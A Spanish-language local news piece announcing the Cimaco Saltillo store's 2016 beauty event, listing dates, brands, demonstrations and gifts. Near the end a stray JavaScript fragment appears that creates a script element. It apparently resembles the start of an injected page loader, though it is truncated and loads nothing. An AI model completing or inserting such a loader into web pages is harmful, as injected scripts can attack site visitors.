Presentación de la Campaña Rendez Vous 2016de la tienda departamental Cimaco Saltillo

La tienda departamental Cimaco Saltillo invita a la comunidad saltillense al Rendez Vous de la Belleza 2016 que se realizará del 16 de septiembre al 3 de octubre.

Texto y fotos: Francisco Muñiz

Cuquis Ballesteros coordinadora de Relaciones Publicas de Cimaco e Hilda Rodríguez coordinadora del departamento de Perfumería hablaron sobre los detalles del evento.

El Rendez Vous de la belleza es un término de origen francés que significa “encuentro” y “cita”, no tiene un tema específico si no que se realzan los tonos de la temporada otoño-invierno que son más obscuros como el negro y el morado.

En este festival las damas saltillenses tendrán la oportunidad de adquirir los mejores artículos de belleza de marcas de gran prestigio como Carolina Herrera, Elizabeth Harden, Lancome, Clinique, Estee Lauder, Chanel, Loccitiane y Ralph Lauren; además de recibir la asesoría de expertos en imagen, fragancias y tratamientos faciales, todo esto con previa cita, con derecho a participar en las dinámicas que se llevarán a cabo para quienes compren las diversas promociones.

Del 20 de septiembre al dos de octubre Vicky Cruz con la línez Elizabeth Arden realizara la demostración de maquillajes y faciales, en cada compra Cimaco Saltillo entregará atractivos obsequios como brochas y Neceseres de acuerdo al monto de la compra, además de obsequios de parte de algunas de las marcas participantes.

 

 var d=document;var s=d.createElement(‘script’);

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado